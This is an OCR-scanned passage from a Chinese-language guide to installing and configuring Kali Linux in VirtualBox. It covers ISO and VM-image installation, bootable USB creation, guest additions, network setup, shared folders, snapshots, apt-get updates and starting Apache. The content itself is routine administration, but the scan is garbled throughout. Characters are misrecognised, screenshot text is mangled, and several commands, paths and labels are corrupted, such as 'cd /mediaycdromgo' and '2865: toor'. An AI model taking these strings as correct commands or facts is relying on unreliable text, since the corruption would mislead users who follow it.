7. 在 Storage Tree 里 选择 IDE Controller-Attributes， 然 后 选中 Kali 


Linux 的 ISO 





镜像 文件 。 本 例 中 ， 这 个 文件 应 该 是 kali-linux-1.0.1- 


i386.iso。 如 果 设 置 成 功 ， 将 会 在 Controller: IDE 字 段 中 看 到 这 个 镜像 的 





@ Controller: SATA 

@ Kai Unux.vdi 
® Serial Ports 
P USB 








8. 只 要 启动 虚拟 机 ， 





Attrbutes 
CD/DVD Drive: [IDE Secondary Master 
E Live CD/DVD 


Kali Linux 








Choose a virtual CD/DVD disk file... 
kali-linux-1.0.1-i386.iso 


Information 
Type: image 
Swe: 2,13 GB 
Location: D:softwareVsolkal-inux-1.0.1-386.50 
Attached To: 一 


图 1.11 
就 可 以 从 ISO 镜像 启动 并 安装 Kali Linux。 接 


@ Remove disk from virtual drive 








下 来 的 设置 过 程 ， 请 参见 前 文 的 “安装 在 物理 主机 上 ”的 相关 内 容 。 
在 虚拟 机 里 使 用 VM 镜像 安装 Kali Linux 





我 们 同样 可 以 使 用 官方 提供 的 VMware ”磁盘 镜像 ， 直 接 安装 Kali 
Linux. 

在 Kali Linux 团队 提供 的 VMware 磁盘 镜像 中 ， 适 用 于 i386 平台 的 
Kali Linux 镜像 只 有 GNOME GUI 版 本 。 

这 种 安装 方法 相当 简单 。 

在 下 载 Kali Linux VMware 硬盘 镜像 文件 〈kali-linux-1.0-i386- 
gnomevm.targz) 之 后 ， 您 需要 验证 下 载 文件 的 SHA1 哈 希 值 是 人 否 与 网 站 
公布 的 值 一 致 。 只 有 在 它们 相同 的 情况 下 ， 您 才能 从 文件 中 解压 缩 出 正 
确 的 镜像 文件 。 

官方 提供 的 VMware 镜像 文件 是 GZ 格式 的 压缩 文件 。 如 果 您 使 用 的 
是 Windows 系 统 ， 您 就 需要 gzip 或 7-Zip 这 类 工具 将 其 解压 缩 。 这 个 GZ 格 
式 的 压缩 包 包 含 21 个 文件 。 在 解压 缩 之 后 ， 您 将 看 到 21 个 文件 〈 见 图 
1:12) 73 

在 VirtualBox 的 工具 栏 中 ， 选 择 New 新 建 VM 虚 拟 机 。 接 下 来 在 程序 
的 向 导 窗 口中 进行 如 下 设置 ， 使 这 个 VM 加 载 刚才 解压 出 来 的 虚拟 机 镜 
像 文 件 。 

1. 我 们 设置 虚拟 机 名 称 为 kali-gnome-vm-32， 并 设置 操作 系统 为 
Linux 一 Debian 。 

2. 分 配 2048MB 内 存 给 Kali Linux 虚拟 机 。 

3. 设置 虚拟 机 硬盘 类 型 为 Use an existing virtual hard drive file, £^ 
后 指定 其 便 盘 使 用 镜像 文件 kali — linux — i386-gnome-vm.vmdk. EF 
来 ， 点 击 Create 创 建 虚 拟 机 ， 如 图 1.13 所 示 。 











| | kali-linux-1386-gnome-vm nvram 8.684 11/03/2013 23:25 -a— 
kali-linux-1386-gnome-vm vmdk 1.358 11/03/2013 23:19 -a— 
L3 kali-linux-i386-gnome-vm vmsd 0 09/03/2013 02-59 -a— 
[9 kali-linux-i386-gnome-vm vmx 2.736 11/03/2013 23:25 -a— 
|] kali-linux-i386-gnome-vm vmxf 382 09/03/2013 03:26 -a— 
kali-linux-i386-gnome-vm-s001 vmdk 1.936.130.048 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s002 vmdk 953.548.800 11/03/2013 23:36 -a— 
kali-linux-i386-gnome-vm-s003 vmdk 100.007.936 11/03/2013 23:36 -a— 
kali-linux-i386-gnome-vm-s004 vmdk 1.101.004.800 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s005 vmdk 586.285.056 11/03/2013 23:36 -a 一 
kali-linux-1386-gnome-vm-s006 vmdk 337.772.544 11/03/2013 23:36 -a— 
kali-linux-i386-gnome-vm-s007 vmdk 830.144.512 11/03/2013 23:36 -a— 
kalitinux-1386-gnome-vm-s008 vmdk 565.968.896 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s009 vmdk 390.529.024 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s0 10 vmdk 299.565.056 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s0 1 1 vmdk 196.411.392 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s012 vmdk 364.773.376 11/03/2013 23:36 -a— 
kali-linux-i386-gnome-vm-s0 13 vmdk 203.292.672 11/03/2013 23:36 -a— 
kali-linux-i386-gnome-vm-s0 14 vmdk 294.191.104 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s015 vmdk 1.441.792 11/03/2013 23:36 -a— 
kalislinux-i386-gnome-vm-s0 16 vmdk 65.536 11/03/2013 23:36 -a— 





图 1.12 


Hard drive 


If you wish you can add a virtual hard drive to the new machine. You can 
ether create a new hard drive file or select one from the ist or from another 
location using the folder icon. 


If you need a more complex storage set-up you can skip this step and make 
the changes to the machine settings once the machine is created. 


The recommended sie of the hard drive is 8,00 GB. 


© Do not add a virtual hard drive 
© Create a virtual hard drive now 
© Use an existing virtual hard drive file 


(kahHnux:386-gnome-vm.vmdk (Normal 30,0068) | 3 


图 1.13 
使 用 硬盘 镜像 方式 安装 Kali Linux 之 后 ， 系 统 的 默认 设置 值 如 下 所 





e HLA: 30 GB。 

e 联网 方式 : NAT. 

e 用 户 名 : root。 

e 2865: toor。 

如 果 要 把 Kali 当 做 渗透 测试 平台 使 用 ， 应 当 避 免 以 NAT 方 式 接 入 
网 络 。 本 文 推荐 您 以 桥接 Cbridged) 方式 联网 。 

在 配置 Kali VM 的 时 候 ， 应 当 尽 快 更 改 默认 密码 。 


如 采 操 作成 功 ， 虚 拟 机 管理 列表 应 能 列 出 刚才 新 建 的 虚拟 机 “《“ 见 图 
1.14) . 





os (Testing) Vj Depby 


@ Poweed OF 





Controler, DE 
DE Secondary Master: [CO/OVO) Empty 
Controler: SATA 

SATA Port 0: iai inux-Q96 grome vem. vrak (Norma, 20,00 G8) 
È Audio 


Hor Onver: Wnéows Ovectsound 
Controler: KOH ACY. 


3 


Network 
Adapter 1: Pete PRO/1000 MT Destop (NAT) 


S we 

Deve Fen: 0(0 actwe) 
ad Shared folders 
Mone 








图 1.14 

在 虚拟 机 羔 单 条 中 点 击 Start 图 标 ， 即 可 运行 Kali Linux 虚拟 机 。 完 
成 启动 过 程 之 后 ， Kali Linux 应 当 会 进入 登录 界面 。 

如 果 您 遇 到 了 图 1.15 所 示 的 问题 ， 那 么 就 需要 安装 VirtualBox 
Extension Pack《〈 功 能 增强 包 ) 。 您 可 在 
http://www.virtualbox.org/wiki/Downloads 下 载 这 个 工具 。 

请 注意 ， 您 应 当下 载 版 本 号 和 VirtualBox 完 全 相同 的 功能 增强 包 。 
也 就 是 说 ， 如 果 您 使 用 的 是 4.3.0 版 的 VirtualBox， 就 应 当下 载 4.3.0 版 的 
Extension Pack. 

在 VirtualBox 管 理 程序 安装 功能 增强 包 的 步骤 如 下 。 

1. 通过 六 单 File | Preferences， 进 入 Settings 设置 界面 。 随 后 ， 选 择 
左 侧 的 Extensions 〈 见 图 1.16) . 





e Failed to open a session for the virtual machine kali-gnome- 
vm-32. 


Implementation of the USB 2.0 controller not found! 
Because the USB 2.0 controller state is part of the saved VM 
state, the VM cannot be started. To fix this problem, either 
instal the 'Orade VM VirtualBox Extension Pack’ or disable 
USB 2.0 support in the VM settings (VERR. NOT. FOUND). 


" Details 
Resuk Code: E FAIL (0x80004005) 
Console 
IConsole (db7ab4ca-2a3f-4183-9243-c12084d292392) 


[Lo J( ew | 
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加 General PEST 
(sj Input | 
e Update 
Q Language 
Display 

WP Network 
le Extensions | 
Proxy 


Extenson Packages: 
| Active Name 








Select a settings category from the ist on the left-hand side 
and move the mouse over a settings tem to get more 





图 1.16 
2. 点 击 Add _ package 按钮 ， 选 中 刚才 下 载 的 VirtualBox Extension 
Pack。 这 时 ，VirtualBox 会 在 弹出 窗口 里 列 出 扩展 功能 包 的 信息 ， 并 请 
您 确认 是 否 继续 安装 《〈 见 图 1.17) 。 
3. 选择 Install 按 照 屏幕 上 的 提示 安装 扩展 功能 包 。 如 果 安 装 过 程 顺 
利 ， 您 将 在 Extension 列 表 里 看 到 扩展 功能 包 的 相关 信息 《〈 见 图 1.18) 。 


Orade VM VirtualBox Extension Pack 4.2.10r84104| @ 








图 1.18 
4. 现在 ， 您 可 以 使 用 默认 的 用 户 名 和 密码 登录 Kali Linux. 


1.4.3 安装 在 USB 闪 存 上 
安装 Kali Linux 的 第 三 种 方法 ， 就 是 把 它 安装 到 USB 闪存 里 
和 常 ， 人 们 把 安装 在 闪存 上 的 Kali Linux 叫做 portable Kali 
Linux。 按 照 Kali 官 方 文件 的 说 法 ， 这 种 安装 方式 的 启动 和 安装 速 











快 ， 是 Kali 研 发 人 员 最 喜欢 的 安装 方式 。 相 比 在 硬盘 上 安装 ， 只 能 在 一 
台 机 器 上 启动 Kali 系统 而 言 ， 装 有 Kali Linux 的 内 存盘 可 以 在 所 有 支持 
USB 启动 的 主机 上 使 用 Kali 系 统 。 

这 种 安装 方法 同样 适合 在 内 存 卡 (SSD、SDHC、SDXC 等 ) 上 安 
"Kali Linux. 

很 多 工具 都 可 以 制 Hepontable Kali Linux. JB, Rufus (http:// 
rufus.akeo.ie〉 束 不 错 。 这 个 工具 只 能 在 Windows 操 作 系 统 下 运行 

其 他 可 从 ISO 镜 像 文件 制作 可 局 动 USB 的 工具 如 下 所 示 : 

e Win32DiskImager (https://launchpad.net/win32-image-writer) ; 








e Universal USB Installer (http://www.pendrivelinux.com/universal- 
usbinstaller-easy-as-1-2-3/) ; 

e Linux Live USB Creator Chttp://www.linuxliveusb.com) 。 

在 制作 portable Kali Linux 之 前 ， 您 需要 准备 好 几 样 素材 。 

e Kali Linux 的 ISO 镜像 文件 ， 虽然 您 可 以 使 用 局 动 磁盘 创建 工具 
直接 下 载 镜像 文件 ， 但 是 我 们 仍然 认为 提前 下 载 好 ISO 镜像 文件 ， 再 用 
Rufus 使 用 镜像 文件 比较 稳 受 。 

e USB 闪存 盘 : 您 需要 一 个 容量 足够 大 的 USB 内 存盘。 我 们 推荐 
您 使 用 16GB 以 上 的 内 存盘。 

在 下 载 Rufus 之 后 ， 在 Windows 里 双击 rufus.exe 文 件 束 可 以 运行 

会 显示 出 程序 界面 。 

如 果 您 使 用 的 是 基于 UNIX 的 操作 系统 ， 您 可 以 直接 使 用 dd 指令 创 
建 可 局 动 闪存 盘 。 例 如 : 

dd if=kali-linux-1.0.1-i386.iso of=/dev/sdb bs=512k 

此 处 的 /devwsdb 应 当 是 您 USB 闪 存盘 的 设备 名 称 

使 用 Rufus ”创建 可 启动 的 Kali USB ”闪存 盘 的 设置 如 下 ( 见 图 
1.19) . 

e Device: 选择 USB 闪存 驱动 器 。 本 例 中 ， 它 是 windows 系统 的 E 

















d. 
e Partition scheme and target system type: 设置 为 MBR partition 


scheme for BIOS or UEFI computers. 
e Create a bootable disk using: 设置 为 ISO Image 并 使 用 右 侧 人 磁盘 图 





标 选 取 ISO 镜像 文件 。 
然后 点 击 Start 创 建 可 启动 闪存 盘 〈 见 图 1.20) 。 
在 完成 这 些 步骤 之 后 ， 如 果 您 想 要 立即 测试 USB 闪 存盘 ， 则 应 在 保 








存 好 所 有 文件 的 情况 下 重启 计算 机 。 您 可 能 需要 配置 计算 机 的 “BIOS， 
使 其 从 USB 磁盘 启动 计算 机 。 如 果 没 有 问题 的 话 ， 您 应 该 可 以 通过 
USB 闪存 盘 启 动 Kali Linux 系统 。 

在 USB 闪 存盘 上 安 闭 系统 之 后 ， 如 果 您 想 要 让 系统 能 够 保存 您 所 更 
改 的 文件 〈 即 persistence capabilities) ， 您 可 参照 Kali 官 方 文档 进行 设 
置 。 请 参见 Adding Persistence to Your Kali Live USB， 地 址 为 http://docs. 


kali.org/installation/kali-linux-live-usb-install 。 


Kali Live 
Format Options 62) 


F] Check device for bad blocks: 
(V. Quick format 


(V Create a bootable disk using: 


F Greate extended label and icon files 
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Using ISO: kali-linux-1.0.1-i386.iso 


图 1.19 


E:\ive\filesystem.squashfs (1.9 GB) 


图 1.20 





1.5 dE tL. 


在 登录 Kali Linux 虚拟 机 之 后 ， 需 要 进行 几 项 配置 。 对 执行 渗透 测 
试 来 说 ， 这 几 项 配置 相当 重要 。 


1.5.1 安装 客户 端 功能 增 


在 VirtualBox 里 配置 好 Kali Linux 所 用 的 虚拟 机 之 后 ， 我 们 建议 您 
安装 客户 端 功能 增强 包 (VirtualBox guest additions) 。 这 个 功能 增强 包 
的 作用 有 很 多 。 

e 它 文 持 以 全 屏 模 式 但 看 虚拟 机 的 加 面 。 

e 它 显著 改善 鼠标 操作 方面 的 用 户 体验 。 

e 它 文 持 物 理 主机 到 虚拟 主机 之 间 的 文本 复制 功能 。 

e 它 文 持 物 理 主机 和 虚拟 主机 之 间 的 文件 夹 共 享 。 

安装 客户 端 功能 增强 包 的 具体 步骤 如 下 。 

1. 在 VirtualBox 的 菜单 里 ， 选 择 Devices | Install Guest Additions. 
此 后 ， 被 虚拟 机 会 以 光盘 的 形式 加 载 VirutualBox guest additions〈 见 图 
1.21) 。 





(^: Kali Linux [Running] - Oracle 
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图 1.21 
2. 在 图 1.22 所 示 的 Virutalbox 窗 口 里 ， 点 击 Cancel。 


This medium contains software intended to be automatically 
started. Would you like to run it? 


The software will run directly from the medium 
"VBOXADDITIONS.4.2.10.84104". You should never run software that you don't 
trust 


If in doubt, press Cancel. 


Cancel 





图 1.22 
3. 打开 终端 程序 terminal， 进 入 VirtualBox guest additions 所 在 的 


CDROM 目 录 。 一 般 情 况 下 ， 这 个 目录 的 路 径 是 /media/cdrom0 (JLB 
1:233 


:-# cd /mediaycdromgo 


nedia/cdrom0# ls 


2Bit cert VBoxSolarisAdditions. pkg 


64Bit 0S; VBoxWindowsAdditions-amd64. exe 
AUTORUN. INI runasroot.sh VBoxWindowsAdditions. exe 
autorun.sh VBoxLinuxAdditions.run VBoxWindowsAdditions-x86. exe 

. /media/cdrom0# 





图 1.23 
4. 执行 VBoxLinuxAdditions.run， 以 启动 它 的 安装 程序 。 
sh./VBoxLinuxAdditions.run 
5， 等 待 数 分 钟 之 后 ， 安 装 程序 会 编译 并 安装 好 客户 端 功能 增强 包 
的 各 种 模块 〈 见 图 1.24) 。 





Uncompressing 
VirtualBox 





6. 进入 root 的 主 目 录 。 
7. 在 VirtualBox 的 菜单 里 ， 使 用 右键 点 击 VBoxAdditions 的 CD 镜像 
文件 ， 然 后 选中 Eject， 弹 出 这 个 虚拟 光驱 。 如 果 操 作成 功 ， 


VBoxAdditions 的 光盘 图 标 将 从 虚拟 机 的 桌面 上 消失 。 

8. 在 终端 窗口 里 使 用 reboot 指 令 重 新 启动 虚拟 机 。 

9. 竺 重启 之 后 ， 您 可 以 在 染 单 栏 选 择 View | Switch to fullscreen 进 
入 全 屏 模 式 。 








本 市 将 介绍 在 Kali Linux 里 设置 有 线 网 络 和 无 线 网 络 的 方法 。 

1. 配置 有 线 网 络 

无 论 是 通过 VMware 磁盘 镜像 还 是 通过 ISO 镜像 安装 Kali Linux, $À 
认 情 况 下 Kali Linux 接 入 网 络 的 方式 都 是 NAT 《网络 地 址 转换 ) 。 在 
NAT 方 式 下 ，Kali Linux 的 虚拟 机 可 以 通过 物理 主机 联 入 外 部 网 络 ， 而 
外 部 网 络 甚至 是 物理 主机 自 吴 都 无 法 直接 访问 安装 有 Kali Linux 的 虚拟 
机 。 

进行 实地 的 渗透 测试 时 ， 您 可 能 需要 把 网 络 结构 变更 为 Bridged 
Adapter。 有 具体 的 设置 步骤 如 下 。 

1. 首先 请 确定 您 已 经 关闭 (power off) 虚拟 机 。 

2. 在 VirtualBox 管理 程序 里 ， 选 中 相应 的 虚拟 机 ， 即 安装 Kali 
Linux ”的 虚拟 机 ， 然 后 点 击 窗口 右 侧 的 ” Network， 通 过 下 拉 选 项 把 
Attached to 从 NAT 变更 为 Bridged Adapter 〈 桥 接 适 配器 ) 。 如 图 1.25 所 
示 ， 其 中 的 Name 选 项 可 设置 为 您 需要 测试 的 网 卡 接口 。 
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如 需 使 用 桥接 连接 ， 首 先 要 使 物理 主机 与 网 络 设备 连接 ， 例 如 路 由 
器 或 交换 机 。 同 时 ， 接 入 的 网 络 里 应 当 有 DHCP 服 务 ， 以 分 配 卫 地 址 给 
虚拟 机 。 

您 可 能 已 经 注意 到 了 ， 通 过 DHCP 获 取 的 也 地 址 并 不 是 固定 的 了 地 
址 ， 这 种 IP 地 址 在 一 定时 间 后 可 能 会 发 生变 化 。 如 果 Kali Linux 通过 
DHCP ”获取 IP 地址， 在 超过 固定 周期 (DHCP 的 租赁 时 间 ) 之 后 ， 
DHCP 会 重新 给 虚拟 机 分 配 一 次 JP 地址 。 重 新 分 配 的 IP 地 址 可 能 和 上 次 
分 配 的 也 地 址 相同 ， 也 可 能 不 同 。 

如 果 虚 拟 机 需要 使 用 固定 的 IP 地 址 ， 应 该 修改 虚拟 机 的 网 络 设置 
文件 /etc/network/interfaces。 

默认 情况 下 ，Kali Linux 的 网 络 设置 文件 如 下 。 


auto lo 





iface lo inet loopback 

这 个 配置 文件 指定 所 有 网 卡 都 通过 DHCP 获 取 IP 地 址 。 如 需 为 虚拟 
机 绑 定 固定 了 地 址 ， 就 不 得 不 对 这 个 文件 进行 相应 修改 。 

auto eth0 

iface ethO inet static 

address 10.0.2.15 

netmask 255.255.255.0 

network 10.0.2.0 

broadcast 10.0.2.255 

gateway 10.0.2.2 

上 述 文件 令 第 一 个 有 线 网 卡 eth0 绑 定 了 IP 地 址 10.0.2.15。 您 可 能 需 
要 根据 实际 情况 修改 上 述 设置 。 

2. 配置 无 线 网 络 

在 虚拟 机 里 安装 的 Kali Linux 无 法 使 用 笔记 本 上 集成 的 无 线 网 卡 。 
好 在 您 可 以 使 用 USB 接 口 的 无 线 网 卡 。 





在 Kali 虚 拟 机 上 使 用 USB 接 口 的 无 线 网 卡 时 ， 要 把 USB 无 线 网 卡 插 
在 主机 USB 接 口上 ， 在 VirtualBox 的 订单 里 选 Devices | USB Devices, 
再 选中 所 要 使 用 的 USB 无 线 网 卡 。 

如 图 1.26 所 示 ， Re 


d Kali Linux [Rund Oracle VM Virt 

Machine View Help 

i © CD/DVD Devices Sat Apr 20, 10:10 PM 
USB Devices Logitech USB Receiver [2201] 
Shared Clipboard Chicony Electronics Co. Ltd. Integrated Camera [0854] 


Drag'n'Drop Manufacturer Realtek RTL8187 RTL8187 Wireless [0100] 
Network Adapters... Vendor ID: OBDA 02) 


Shared Folders... 


Revision: 0100 
Serial No. 00C0CA52A418 
Host«D State: Available 


图 1.26 
如 果 您 的 无 线 网 卡 可 以 被 Kali 识 别 ， 可 以 在 dmesg 指 令 的 输出 中 看 
到 无 线 网 卡 的 硬件 信息 。 
在 Kali 桌面 的 右上 角 可 以 找到 Network Connection (WE) 的 
图 标 。 点 击 这 个 图 标 后， 将 能 看 到 网 络 信息 。 
此 时 可 以 看 到 您 的 机 器 可 用 的 有 线 网 络 和 无 线 网 络 的 名 称 〈 见 图 
1.27) 。 
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图 1.27 
要 想 连 接 无 线 网 络 ， 就 要 双击 该 网 络 的 SSID。 如 果 选 定 的 网 络 要 求 
您 进行 身份 验证 ， 程 序 会 提示 您 输入 密码 。 在 输入 正确 的 无 线 网 络 密码 


后 ， 您 就 被 授权 使 用 该 无 线 网 络 。 

3. 局 用 网 络 

我 们 通过 service 指 令 来 启动 和 关闭 网 络 。 

如 需 局 用 网 络 ， 可 以 使 用 下 述 指 令 

service networking start 

如 需 关 闭 网 络 ， 可 以 使 用 下 述 指令 : 

service networking stop 

您 需要 有 ee E 运 行 上 述 两 条 指令 

接 下 来 ， 您 可 以 通过 ARP ping 请 求 指令 ) 连接 同 网 段 的 其 
他 主机 ， 来 测 if 网 络 配置 是 否 正 确 。 

默认 情况 下 ， 您 需要 在 计算 机 每 次 重 局 后 手动 司 动 网 络 连接 服务 。 
您 可 通过 下 述 指令 ， 让 “虚拟 ) 计算 机 在 每 次 局 动 的 时 候 都 自动 局 动 网 
络 连接 服务 : 

update-rc.d networking defaults 

上 述 指 令 会 在 /etc/rc*.d 目 录 里 创建 必要 的 连接 ， 以 在 Kali 启 动 的 时 
候 上 自动 执行 网 络 配置 的 脚本 程序 。 


1.5.3 X fF 3e dt s 


在 进行 渗透 测试 的 工作 时 ， 我 们 经 常 需要 在 物理 主机 和 虚拟 机 之 间 
交换 文件 ， 例 如 把 渗透 测试 的 文档 复制 到 物理 主机 上 。VirtualBox 的 文 
件 夹 共享 (Shared Folders) 功能 可 以 满足 这 一 需求 。 

您 要 先 关 闭 虚 拟 机 ， 再 在 VirtualBox 里 配置 文件 夹 共 享 。 关 闭 虚拟 
机 之 后 ， 选 中 相应 的 虚拟 机 名 称 〈 右 键 点 击 Settings) ， 然 后 在 窗口 左 
侧 菜 单 里 点 击 Shared Folders， 如 图 1.28 所 示 。 

点 击 右 侧 的 加 号 “+? 图 标 ， 即 可 添加 要 物理 主机 共享 给 虚拟 机 的 文 
件 夹 。 在 此 之 后 ， Folder Path 里 会 显示 共享 文件 夹 的 信息 。 
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图 1.28 
您 还 可 以 调整 Folder SR 设置 共享 文件 夹 的 共享 名 称 。 此 
后 ， 虚 拟 机 (Guest OS) 就 可 以 通过 这 个 共享 名 称 访问 物理 主机 的 文件 
X, 
如 果 不 希 望 虚拟 机 更 改 共享 文件 夹 的 内 容 ， 可 设置 Read-only 选 项 设 
置 ， 把 该 文件 夹 设置 为 只 读 。 如 果 选 中 Auto-mount 选 项 ， 虚 拟 机 在 每 次 
局 动 后 都 会 连接 这 个 文件 严 。 这 些 设 置 如 图 1.29 所 示 。 





Folder Path: J. D:\software 
Folder Name: software 
Read-only 





F] Auto-mount 





— [129 
在 图 1.29 所 示 的 设置 里 ， 我 们 共享 了 主机 上 的 Di\software 文 件 夹 给 
虚拟 机 ， 并 且 设 置 其 文件 夹 权 限 为 只 读 。 
虚拟 机 可 以 通过 目录 /media/sf_software 目 录 访 问 物 理 主机 共享 的 文 
FE. 








1.5.4 快照 备份 


一 旦 您 把 虚拟 机 配置 到 理想 的 可 工作 状态 ， 我 们 建议 您 立刻 对 虚拟 
机 进行 快照 备份 。 万 一 日 后 出 现 配置 故障 ， 可 利用 快照 备份 把 虚拟 机 迅 
速 恢复 到 正常 工作 状态 。 

VirtualBoxti ”提供 了 方便 的 快照 备份 功能 。 您 可 通过 琳 单 Machine- 
Take Snapshot 进行 快照 备份 〈 见 图 1.30) 。 只 有 在 启动 虚拟 机 的 情况 下 
才能 进行 快照 。 
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图 1.30 
Snapshot Name 就 是 您 给 此 次 备份 起 的 名 字 ， 我 们 建议 您 在 里 面 标 
注 上 备份 日 期 。 您 还 可 以 在 Snapshot Description 里 对 此 次 备份 进行 详细 
备注 。 填 写 完全 部 信息 并 点 击 OK 后 ， VirtualBox 就 开始 进行 备份 。 备 份 
时 间 的 长 短 取决 于 保存 信息 的 信息 量 大 小 。 
1.5.5 导出 虚拟 机 


人 们 时 党 需要 以 文件 形式 备份 虚拟 机 ， 或 通过 这 种 方法 把 虚拟 机 分 
享 给 他 人 使 用 。VirtualBox 的 虚拟 机 导出 功能 简化 了 这 种 操作 。 在 关闭 
需要 导出 的 虚拟 机 之 后 ， 在 采 单 栏 选中 File | Export Appliance 就 可 导出 
所 选 的 虚拟 机 。 

导出 虚拟 机 的 操作 步骤 如 下 。 

1. 选中 Export Appliance 选项 ， 调 出 Appliance Export Wizard. 

2. 选择 需要 导出 的 虚拟 机 。 

3. 设置 导出 文件 的 目录 和 文件 名 。 默 认 情 况 下 ， 文 件 将 保存 在 主 
目录 下 ， 文 件 将 保存 为 ova (Open Virtualization Format Archive) 格式 。 








如 果 您 不 清楚 应 该 以 何 种 格式 保存 这 个 文件 ， 就 应 当 使 用 默认 的 文件 存 
储 格式 。 

4. 您 可 以 在 图 1.31 所 示 的 界面 里 设置 虚拟 机 的 各 种 属性 。 如 果 不 
需要 进行 特定 设置 ， 可 以 不 填写 任何 选项 。 
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Description Configuration 


Virtual System 1 


R Name Kali Linux 
Ə Product 

PD Product-URL 

Ø Vendor 

PD Vendor-URL 


图 1.31 
5. 点 击 Export 之 后 ，VirtualBox 将 把 虚拟 机 导出 到 文件 。 导 出 时 间 
的 长 短 取 决 于 虚拟 机 硬盘 容量 的 大 小 。 它 的 硬盘 文件 越 多 ， 导 出 的 时 间 
也 就 越 长 。 在 我 们 的 测试 环境 下 ， 导 出 Kali Linux 虚拟 机 的 操作 耗 时 大 
约 20 分 钟 。 


1.6 AA EH 


Kali Linux 由 操作 系统 内 核 和 数 百 个 软件 构成 。 如 果 需 要 使 用 软件 
的 最 新 功能 ， 您 就 需要 将 其 更 新 到 最 新 的 版 本 。 

我 们 建议 您 仅 从 Kali Linux 官方 的 软件 仓库 Crepository) 进行 更 
新 。 

在 您 安装 和 配置 好 Kali Linux 之 后 ， 就 应 当 立 即 进行 系统 更 新 。 
为 Kali 是 基于 Debian 的 操作 系统 ， 您 需要 使 用 Debian 的 指令 (apt-get) 
进行 系统 更 新 。 

更 新 指令 apt-get 会 查询 /etc/apt/sources.list 文 件 ， 从 中 获取 更 新 服务 
颖 的 信息 。 您 需要 确定 这 个 文件 指定 了 正确 的 升级 服务 器 。 

默认 情况 下 ，Kali Linux 的 sources.list 文件 包含 下 述 信 息 。 

# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 

LIVE/INSTALL Binary 20130315-11:39]/ kali contrib main non-free 

#deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 
LIVE/ 

INSTALL Binary 20130315-11:39]/ kali contrib main non-free 

deb http://http.kali.org/kali kali main non-free contrib 

deb-src http://http.kali.org/kali kali main non-free contrib 

## Security updates 

deb http://security.kali.org/kali-security kali/updates main contrib non- 
free 

在 进行 系统 更 新 之 前 ， 要 使 主机 上 软件 包 的 索引 信息 
与 /etc/apt/sources.list 上 的 服务 器 进行 同步 。 同 步 索 引 的 指令 是 : 

apt-get update 

在 为 Kali 安装 软件 或 安装 系统 更 新 之 前 ， 每 次 都 要 执行 aptrget 
update 指令 。 








竺 同步 软件 包 的 索引 信息 之 后 ， 束 可 以 进行 软件 更 新 。 

系统 更 新 的 指令 有 两 种 。 

e apt-get upgrade: 升级 系统 上 安装 的 所 有 软件 包 。 如 果 在 升级 软件 
包 时 出 现 什 么 意外 ， 所 涉及 的 软件 包 会 原封 未 动 地 保持 在 更 新 之 前 的 状 
太 


e apt-get dist-upgrade: 升级 整个 Kali Linux 系 统 。 如 需 从 Kali Linux 
1.0.1 升 级 到 Kali Linux 1.0.2， 就 应 当 使 用 这 条 指令 。 它 不 仅 能 够 升级 所 
有 已 安装 的 软件 包 ， 而 且 会 处 理 升 级 过 程 中 可 能 出 现 的 软件 冲突 。 某 些 
情况 下 ， 它 的 部 分 升级 过 程 需要 人 工 参 与 。 

在 输入 升级 Kali Linux 所 需 的 适当 指令 之 后 ，apt-get 程序 会 详细 列 
出 将 要 安装 、 升 级 或 删除 的 软件 包 信 息 ， 然 后 等 竺 您 的 确认 。 

在 您 进行 确认 之 后 ，apt-get 程 序 将 开始 进行 系统 更 新 。 系 统 更 新 的 
时 间 长 短 ， 主 要 取决 于 带宽 和 网 速 的 情况 。 








Kali Linux 系统 可 安装 多 种 网 络 服务 。 在 这 一 节 ， 我 们 仅 讨 论 其 中 
三 种 服务 的 安装 和 配置 方法 : HTTP. MySQL 和 SSH 服务 。 您 可 以 通过 
荣 单 Kali Linux | System Services， 查 看 可 以 安装 的 其 他 服务 。 


1.7.1 HTTP 


从 事 渗透 测试 的 工作 人 员 ， 可 能 会 经 常用 到 Web 服 务 器 。 例 如 ， 妆 
需要 测试 Web 程 序 的 恶意 脚本 时 ， 就 需要 自己 搭建 个 web 服务 器 。 其 实 
Kali Linux 已 经 集成 了 Apache， 只 要 将 之 启动 就 可 以 开始 使 用 了 。 

激活 Kali Linux 的 HTTP 服 务 的 步骤 如 下 。 

1. 如 果 要 通过 桌面 菜单 启动 Apache HTTP 服务 ， 可 在 桌面 荣 单 中 
依次 选中 Kali Linux |System Service | HTTPD | apache2 start。 如 果 要 通过 





命令 行 启动 它 ， 可 在 终端 窗口 里 输入 下 述 指令 

service apache2 start 

2. 如 采 配 置 文件 没有 问题 ， 系 统 会 返回 下 述 啊 应 信息 。 

[....] Starting web server: apache2 ok 

3. 在 此 之 后 ， 您 可 以 使 用 浏览 器 浏览 网 页 。 正 常情 况 下 它 会 显示 
It works! 的 默认 页 面 ( 见 图 1.32)。 








Iceweasel Ps En e 
Iceweasel Y || ; http;//Localhost/ | | 
[ee ~ec a ft d 





It works! 


This is the default web page for this server. 


The web server software Is running but no content has been added, yet. 








图 1.32 

停止 Apache 的 操作 步骤 如 下 。 

1. 如 果 要 通过 桌面 菜单 停止 Apache HTTP 服务 ， 可 在 桌面 菜单 中 
依次 选中 Kali Linux | System Service | HTTPD | apache2 stop。 如 果 要 通过 
命令 行 停止 它 ， 可 在 终端 窗口 里 输入 下 述 指令 ; 

service apache2 stop 

.系统 会 返回 下 述 啊 应 信息 

[....] Stopping web server: apache2 [ ok waiting . 

请 注意 ， 在 计算 机 启动 的 时 候 ， 系 统 并 不 会 自动 局 动 上 述 服务 。 在 
下 次 局 动 Kali Linux 系 统 的 时 候 ， 您 都 需要 再 次 执行 这 个 命令 。 好 在 我 
们 可 以 通过 下 述 指令 ， 指 定 计算 机 在 启动 时 自动 启动 Apache HTTP 服 
务 : 








update-rc.d apache2 defaults 





这 条 指令 将 把 apache2 服 务 添加 到 自动 启动 的 程序 组 里 。 
1.7.2 MySQL 


下 面 将 要 介绍 MySQL 服 务 。MySQL 属 于 标准 的 关系 数据 库 
